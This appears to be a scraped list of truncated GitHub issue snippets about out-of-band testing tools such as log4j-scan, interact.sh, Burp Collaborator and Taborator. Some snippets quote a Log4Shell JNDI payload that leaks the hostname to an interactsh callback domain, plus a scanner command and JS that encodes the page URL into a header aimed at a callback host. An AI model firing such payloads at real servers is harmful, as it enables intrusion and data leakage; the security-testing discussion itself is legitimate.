-
Using the docker image at https://github.com/christophetd/log4shell-vulnerable-app, this plug fails to detect any issues. I've tried the prebuilt jar, and even tried building myself. Same results.
-
┌──(rootbughunter)-[/opt/log4j-scan]
└─# python3 log4j-scan.py -u "http://ip:port" --dns-callback-provider dnslog.cn …
-
Taborator shows base domain only which is not ideal when there's a lot of pingbacks from the same payload. The following screenshot should serve as a reference where Collborator is showing full domain…
-
The callback URL is being added to the query when running but no results are appearing in the web-app, does it need to be wrapped in brackets or quotes?
-
Hey there.
Just warning that someone is using interact.sh to poke my server on the new exploit on log4j.
`GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4o9naya6um6.interactsh.com/a`
…
-
Move deprecated logic from notify into CLI utility within this repository.
- `biid` intercept (eg via burp upstream proxying which is cross-platform)
- collaborator interactions dump to console on u…
-
I'm Trying To Do Something Like That e.g.
```
var URL = getUrl();
var enc = window.btoa(URL);
setRequestHeader('X-Forwarded-Host', enc + '.id.burp.net' );
```
It's To Add X-Forwarded-Host: bas…
-
### Community Note
- Please vote on this issue by adding a 👍 [reaction](https://blog.github.com/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/) to the original issue to help us …
-
Hi,
The extension crashes with `java.lang.IllegalStateException` when Burp Collaborator is explicitly disabled in the Project options ("Don't use Burp Collaborator" radio box) during an active scan…
tgsyn updated
3 years ago
-
### I received this email the other day, implying there was an XML security vulnerability in a /contact-us/ form on a site we run.
---
It is possible to induce the application to perform server-side…